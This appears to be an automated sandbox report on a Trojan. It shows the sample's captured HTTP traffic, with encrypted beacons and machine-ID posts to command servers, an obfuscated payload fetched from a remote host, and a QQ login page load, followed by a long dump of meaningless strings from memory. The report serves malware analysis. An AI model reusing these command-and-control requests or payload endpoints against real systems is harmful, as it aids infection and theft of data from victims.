User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sun, 28 Dec 2014 21:56:43 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=-301604341; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Mon, 22 Dec 2014 01:30:00 GMT
Content-type: text/html
Content-Length: 5305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-height:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.btn_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:none;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-height:20px;clear:both}#list_uin li input{float:left;margin-bottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;width:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style><script>var g_begTime=new Date();..(function(){...window.onerror = function(msg,url,line){....var t = document.createElement('
<<< skipped >>>
GET /web/get_ad4.asp?type=loadall&machinename=XP9-A8A67A25&cr=yes HTTP/1.1
Accept: */*
Referer:
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Host: VVV.it885.com.cn
Connection: Keep-Alive
Cookie:
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 31217
Content-Type: text/html
Expires: Sun, 28 Dec 2014 21:55:56 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDASSAADAB=DICNKOODLOPMEJEDJIGMCOEO; path=/
X-Powered-By: ASP.NET
Date: Sun, 28 Dec 2014 21:56:55 GMT
<332=$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ3=1 dvu$4$4$117yy....yymqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ5Z3=1 dvu$5$5$7$7$7$7{<1=32$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*jki|ida|Z7=277 dvu$4$4$6557mqqu?**rrr lq==0 fjh fk*r`g*w`b*jki|ida|Z7=277 dvu$5$5$7$7$7$7{<0651$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ6 dvu$7$7$4=10yy....)....)....)....)....)....)....)....)....yymqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ6 dvu$5$5$7$7$7$4{<3324$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ36= dvu$4$4$4562mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ5Z36= dvu$5$5$7$7$7$7{<07=<$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ7 dvu$7$7$00545yy....)....)....)....)....)....)....)....)....yymqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ7 dvu$5$5$7$7$7$4{<1753$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ317 dvu$4$4$4143mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ5Z317 dvu$5$5$7$7$7$7{<06=6$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*jki|ida|Z7=047 dvu$4$4$43557mqqu?**rrr lq==0 fjh fk*r`g*w`b*jki|ida|Z7=047 dvu$5$5$7$7$7$4{<333=$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ360 dvu$4$4$=757mqqu?**rrr lq==0 fjh fk*r`g*w`b*dav|vZ5Z360 dvu$5$5$7$7$7$4{<0647$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ1 dvu$7$7$4316yy....)....)....)....)....)....)....)....)....yymqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ1 dvu$5$5$7$7$7$4{<07<=$wpkl` aii$6 <$mqqu?**rrr lq==0 fjh fk*r`g*w`b*lfdZ7 dvu$7$7$0054<yy....)....)....)....)....)....)....)....)....yymqq
<<< skipped >>>
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:56:52 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:57 GMT
Age: 1735
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:52 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 7006
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GIF89a.....................................wul..y............!..NETSCAPE2.0.....!.......,..........O.......{....Y..`....I.D8.. S.....(.......D..(.I~.. .H`....Z.f....k.N..q...;'.L..!.......,..........N.......{..@.1....Q]AiN.:..)S.T...,........b....$?...Q(0.).j.f....{....n.-~N....!.......,..........M.........,Eeu......%5..E...f3. ......g(..<...L...D".X`.RJ.J.N..........9...=..!.......,..........N...J..Z.'B. ..q`.....P)8./,S&.$.$.......y....D...."..`.R.ak.b.........m..^S....!.......,..........M......Z.gJ.....}.H..I...b$.(.t..}.......~9..@Y,2..........i00......|......t;..!.......,..........M...R..Z..R.. ..}.H..I.l....t.P0....B....v>.CG1.2...i.P....J.0.R-.....J....t;..!.......,..........M......Z..Z..$..}.H..I.l...at..0..........8..B d..L.I.B)...q80...&..t.......3..;..
GET /stat.php?id=4690803&web_id=4690803 HTTP/1.1
Accept: */*
Referer: hXXp://1.rwdns.com/zztj/yeshe.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s6.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 28 Dec 2014 21:57:07 GMT
Last-Modified: Sun, 28 Dec 2014 21:57:07 GMT
Cache-Control: max-age=5400,s-maxage=5400
Via: cache7.l2hk1[62,200-0,M], cache4.l2hk1[62,0], cache3.us1[389,200-0,M], cache1.us1[390,0]
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Sun, 28 Dec 2014 21:57:07 GMT
X-Swift-CacheTime: 5400
b4a..(function(){function k(){this.c="4690803";this.R="z";this.N="";this.K="";this.M="";this.r="1419803827";this.P="hzs9.cnzz.com";this.L="";this.u="CNZZDATA"+this.c;this.t="_CNZZDbridge_"+this.c;this.F="_cnzz_CV"+this.c;this.G="CZ_UUID"+this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=4690803");c.push("name="+f(a.name));c.push("msg="+f(a.message));c.push("r="+f(h.referrer));c.push("page="+f(e.location.href));c.push("agent="+f(e.navigator.userAgent));c.push("ex="+f(b));c.push("rnd="+Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?"+c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b++){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c;i
<<< skipped >>>
POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible)
Host: flow3002.6299.cc
Content-Length: 327
Cache-Control: no-cache
parems=E5495EE00C5B207C93D363C4EACEBE4C1A8F4039E423912CB1985A0EBBE0B468BF078156EA46E4AD10CD2896738052C1C9F9C611E1FF157D25C5D33BBC2D2BFC5D9461BE8F036797D775F43ED496B4EBD22CE5C4E52A84690B63FABE01698C3C4A557FCE382F121BEAB949348F326EAA836219672ECEBC79B7870349A02BCDDFA66ACC875E58357D679885F1500CEC8690CEDE6FD2390128730533516DD3F5AC
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 128
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 28 Dec 2014 21:57:05 GMT
D62863FAE68B8607704484A6A04125491C77642904F91F9D9403A3D6653CC634BD718A92BB0F031A48F9B8942A7083006C6D6B1D918F78795FE9C19470E68ACF....
POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible)
Host: flow3002.6299.cc
Content-Length: 167
Cache-Control: no-cache
parems=2432928EC233CF1BE823ED4456E8F82B777ED11BE4AC5DE49967D124D13CEF98EF810CC1EC1C4239C27CCA4BBE161DF19AF5B126F7E96641757E723256467E1BF7D301DE01B02C3D4024F79AC3D8754C
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 96
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 28 Dec 2014 21:57:26 GMT
32A45B4F6626435761CCBF7971D304AB3076C5A18E5564FC35BC8069371D182A7DDA4F0F0924FF9486B9213262CCB928..
GET /core.php?web_id=4690803&t=z HTTP/1.1
Accept: */*
Referer: hXXp://1.rwdns.com/zztj/yeshe.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 750
Connection: keep-alive
Date: Sun, 28 Dec 2014 21:51:27 GMT
Last-Modified: Sun, 28 Dec 2014 21:51:27 GMT
Expires: Sun, 28 Dec 2014 22:06:27 GMT
Via: cache36.l2ot7[0,200-0,H], cache44.l2ot7[0,0], cache6.us1[10,200-0,M], cache1.us1[11,0]
Age: 340
X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2
X-Swift-SaveTime: Sun, 28 Dec 2014 21:57:07 GMT
X-Swift-CacheTime: 560
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:07 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1751
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:16:01 GMT
If-None-Match: "54977ee1-1eb0"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:12 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1756
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /ptlogin/ver/10107/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 22 Dec 2014 02:17:08 GMT; length=9168
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 304 Not Modified
Date: Sun, 28 Dec 2014 21:57:17 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977f24-23d0"
Cache-Control: max-age=600
Expires: Sun, 28 Dec 2014 22:00:44 GMT
Age: 393
Last-Modified: Mon, 22 Dec 2014 02:17:08 GMT
Connection: keep-alive
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:17 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 7031
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /9.gif?abc=1&rnd=127307938 HTTP/1.1
Accept: */*
Referer: hXXp://1.rwdns.com/zztj/yeshe.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Tengine
Date: Sun, 28 Dec 2014 21:57:08 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=tGonDZSqqmQCAbhrJibBL0IA; expires=Wed, 25-Dec-24 21:57:08 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=3544e6db; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=886b338694b5dbddafd164ce_1419803828; expires=Wed, 25-Dec-24 21:57:08 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=tGonDZSqqmQCAbhrJibBL0IA
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GET /ic.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: 1111.ip138.com
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:58:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 218
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAAASSCBR=AOBLCGDDPBIHEDGDCFKKMDHL; path=/
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....["%local server IP%"] ............</center></body></html>..
GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:45 GMT
Server: PWS/8.1.20.9
X-Px: rf-ms h0-s2078.p9-jfk ( h0-s2050.p9-jfk), ht h0-s2050.p9-jfk.cdngp.net
ETag: "54977ee1-1eb0"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 23:27:56 GMT
Age: 1729
Content-Length: 7856
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /ptlogin/v4/style/0/images/load.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:56:45 GMT
Server: PWS/8.1.20.9
X-Px: ht h0-s2078.p9-jfk.cdngp.net
ETag: "54977ee1-303"
Cache-Control: max-age=7200
Expires: Sun, 28 Dec 2014 22:00:06 GMT
Age: 6999
Content-Length: 771
Content-Type: image/gif
Last-Modified: Mon, 22 Dec 2014 02:16:01 GMT
Connection: keep-alive
GET /xc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: wangbao.6299.cc
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:57:07 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
Last-Modified: Sun, 30 Nov 2014 07:25:47 GMT
Accept-Ranges: bytes
ETag: "f68f7cdc6ecd01:0"
X-Server: Zm9zaGFuMDEtY2RuMTQuZmhs
X-Cache: pass
1:1..
POST /GetData.asp HTTP/1.1
Referer: hXXp://VVV.baidu.com/s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
Content-Type: application/x-www-form-urlencoded;
Host: 1.rwdns.com
Content-Length: 44
Cache-Control: no-cache
SN=ClientSetOnlineV6&SP='YSVC082501-7204244'
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:46:43 GMT
Server: Microsoft-IIS/6.0
Content-Length: 3
Content-Type: text/html; Charset=GB2312
Set-Cookie: ASPSESSIONIDCSRTRSQB=EOHLPBHDNHBAGLHMPFAICOBF; path=/
Cache-control: private
120....
POST /SetData.asp HTTP/1.1
Referer: hXXp://VVV.baidu.com/s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
Content-Type: application/x-www-form-urlencoded;
Host: 1.rwdns.com
Content-Length: 63
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSRTRSQB=EOHLPBHDNHBAGLHMPFAICOBF
SN=ClientSetV6DomainToIp&SP='180.76.3.151','YSVC082501-7204244'
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:46:43 GMT
Server: Microsoft-IIS/6.0
Content-Length: 1
Content-Type: text/html; Charset=GB2312
Cache-control: private
1....
POST /GetData.asp HTTP/1.1
Referer: hXXp://VVV.baidu.com/s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
Content-Type: application/x-www-form-urlencoded;
Host: 1.rwdns.com
Content-Length: 28
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSRTRSQB=EOHLPBHDNHBAGLHMPFAICOBF
SN=ClientGetV6ZiRanKey&SP=IE
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:46:44 GMT
Server: Microsoft-IIS/6.0
Content-Length: 1
Content-Type: text/html; Charset=GB2312
Cache-control: private
0..
POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible)
Host: flow3002.6299.cc
Content-Length: 167
Cache-Control: no-cache
parems=2432928EC233CF1BE823ED4456E8F82B777ED11BE4AC5DE49967D124D13CEF98EF810CC1EC1C4239C27CCA4BBE161DF19AF5B126F7E96641757E723256467E1BF7D301DE01B02C3D4024F79AC3D8754C
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 96
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 28 Dec 2014 21:57:05 GMT
32A45B4F6626435761CCBF7971D304AB3076C5A18E5564FC35BC8069371D182A7DDA4F0F0924FF9486B9213262CCB928....
POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible)
Host: flow3002.6299.cc
Content-Length: 167
Cache-Control: no-cache
parems=2432928EC233CF1BE823ED4456E8F82B777ED11BE4AC5DE49967D124D13CEF98EF810CC1EC1C4239C27CCA4BBE161DF19AF5B126F7E96641757E723256467E1BF7D301DE01B02C3D4024F79AC3D8754C
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 96
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 28 Dec 2014 21:57:15 GMT
32A45B4F6626435761CCBF7971D304AB3076C5A18E5564FC35BC8069371D182A7DDA4F0F0924FF9486B9213262CCB928..
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
lhkmtqb.exe_592:
lhkmtqb.exe_336:
4?%dSfM
4?%dSfM
n%dXA h5r
n%dXA h5r
.USi*
.USi*
!n.pT
!n.pT
^.bdx
^.bdx
u.Yn X
u.Yn X
@$.vM
@$.vM
egSD%S
egSD%S
.dRh=
.dRh=
BCrT
BCrT
Mr.ag
Mr.ag
DZc%u
DZc%u
9
9
d.tU(
d.tU(
.uA10
.uA10
[IP%X
[IP%X
e.nE]
e.nE]
)1.fU
)1.fU
|.GLK
|.GLK
FY.QZPV
FY.QZPV
;.%u\-ib
;.%u\-ib
#S.WB
#S.WB
V>:%fP
V>:%fP
8.jW
8.jW
.ec?fp^M
.ec?fp^M
.Ppe@
.Ppe@
0%uF,
0%uF,
( -D}{
( -D}{
.GezD8
.GezD8
Mr.EF
Mr.EF
.INlo
.INlo
WEBvV
WEBvV
.mFe,
.mFe,
?:ftP
?:ftP
%CM36
%CM36
ðnyVI
ðnyVI
.qE#h
.qE#h
9.mt>:
9.mt>:
?n2.Mymj
?n2.Mymj
E%xbB>
E%xbB>
%5x1Ei
%5x1Ei
"|.Ll
"|.Ll
G.IU/
G.IU/
ûhl;Q
ûhl;Q
a.mYX4
a.mYX4
X^.FkJ
X^.FkJ
q={%u
q={%u
%UdM)
%UdM)
B9)l.emk7
B9)l.emk7
s.aT`Y
s.aT`Y
%.Xd'
%.Xd'
7.Vxn
7.Vxn
W:\We2
W:\We2
&!%Sf
&!%Sf
\M:`.cS
\M:`.cS
u i%S
u i%S
;(.FA
;(.FA
l:\i7f
l:\i7f
I%0x
I%0x
%UXC-j;!6
%UXC-j;!6
(.HAp-
(.HAp-
87.Rfu
87.Rfu
%DT.$Y
%DT.$Y
cGT".Xd
cGT".Xd
o>.soO
o>.soO
.eRN)i
.eRN)i
Q7.Iu}0
Q7.Iu}0
k#%cS
k#%cS
?P'zu}O%D%
?P'zu}O%D%
Np%Xg
Np%Xg
b.DA&
b.DA&
`|.BB
`|.BB
.MoeCDk$
.MoeCDk$
$.RG,
$.RG,
rE)n=%s
rE)n=%s
.KGbk
.KGbk
(.nw:
(.nw:
-%2T%c
-%2T%c
iS%x9
iS%x9
.jZvW
.jZvW
\QeXe
\QeXe
/}.uz
/}.uz
.wK5M
.wK5M
.fjMu/0
.fjMu/0
O~c.bw6.
O~c.bw6.
'.nt-
'.nt-
.aNV.GF;
.aNV.GF;
udw%U
udw%U
}%S0X8t
}%S0X8t
~
~
5f@%f
5f@%f
nh%Dp6
nh%Dp6
!.uHn
!.uHn
.rPml
.rPml
%dyv2N.
%dyv2N.
.FxOl
.FxOl
&.zy:
&.zy:
y .XC
y .XC
.pm/-
.pm/-
6.neXb
6.neXb
<_.ew>
<_.ew>
.XP0.'
.XP0.'
v6.klT
v6.klT
#[w.xD
#[w.xD
{.Waf>aR
{.Waf>aR
%X)Ä
%X)Ä
Z{%f/
Z{%f/
.Om*U2
.Om*U2
.pQGF
.pQGF
%Fre&
%Fre&
".jF
".jF
m8Z%sO
m8Z%sO
K6.zz
K6.zz
3.SPn(4w
3.SPn(4w
-GUe.zu
-GUe.zu
wK.xA
wK.xA
Z.HZ&
Z.HZ&
K/%sK
K/%sK
.dtC#J
.dtC#J
;sqld
;sqld
q.HFN
q.HFN
)3.Jd
)3.Jd
}TZ%.D
}TZ%.D
*[KeyW6N#
*[KeyW6N#
?%u4D
?%u4D
&D!Yn %cg
&D!Yn %cg
.JhzJ\R[
.JhzJ\R[
%f{1
%f{1
%fMZ&
%fMZ&
CúW
CúW
zf"@.hx)
zf"@.hx)
.HReM
.HReM
]].tn
]].tn
.Lpj7M
.Lpj7M
%F fC
%F fC
.thm|SB
.thm|SB
N2%ukW:
N2%ukW:
wp%ct
wp%ct
9E.BC
9E.BC
V.pO0M
V.pO0M
.rWYn
.rWYn
c%sNy
c%sNy
t.EMw0
t.EMw0
.xU#J
.xU#J
d/%fN
d/%fN
%S3ni)
%S3ni)
.wb`c4I
.wb`c4I
`.TJi
`.TJi
.vAIa
.vAIa
XC.av
XC.av
2~%U_
2~%U_
JZ.Vz
JZ.Vz
6O.puR
6O.puR
EÔ@
EÔ@
\O.WX(
\O.WX(
4õ)z
4õ)z
^Q %S
^Q %S
.kOTD
.kOTD
.lgWH
.lgWH
IÓy
IÓy
.JA1SN
.JA1SN
%cO,WS!%;
%cO,WS!%;
.lfZ@
.lfZ@
Y;%F'
Y;%F'
2.JeI
2.JeI
&t.Yw
&t.Yw
9-mNc}
9-mNc}
NuDP
NuDP
uDplm
uDplm
Y(%F=
Y(%F=
m.Ey,]
m.Ey,]
.COow
.COow
v2.NP
v2.NP
@*5%x
@*5%x
Mr@B.lsN
Mr@B.lsN
:B2|%ut
:B2|%ut
E,9NT%So
E,9NT%So
`.OzI
`.OzI
d%UWG
d%UWG
